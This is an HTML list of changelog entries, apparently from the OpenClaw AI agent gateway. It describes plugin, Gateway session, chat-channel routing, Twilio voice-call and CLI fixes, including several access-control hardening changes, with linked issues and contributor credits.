<li>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</li>
<li>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</li>
<li>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</li>
<li>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</li>
<li>Discord/voice: leave voice off for text-only configs unless explicitly configured, rerun configured voice auto-join after gateway RESUMED events, ignore already-destroyed stale voice connections during reconnect cleanup, lengthen the default voice join Ready wait with configurable timeouts, merge configured media-understanding providers such as Deepgram into partial active registries, apply per-channel <code>systemPrompt</code> overrides to voice transcript turns, and run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @sanchezm86, @SecureCloudProjO, @liz709, @darealgege, @kzicherman, @ayochim, @OneMintJulep, @qearlyao, and @aounakram.</li>
<li>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</li>
<li>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</li>
<li>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</li>
<li>Interactive channel payloads: send Discord component-only interaction replies, Slack block-only slash replies, Telegram button/select fallback labels, and LINE quick-reply fallback option text instead of accepting empty renderable payloads. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</li>
<li>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</li>
<li>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</li>
<li>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</li>
<li>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</li>
<li>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</li>
<li>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</li>
<li>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</li>
<li>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</li>
<li>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</li>
<li>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</li>
<li>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</li>
<li>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
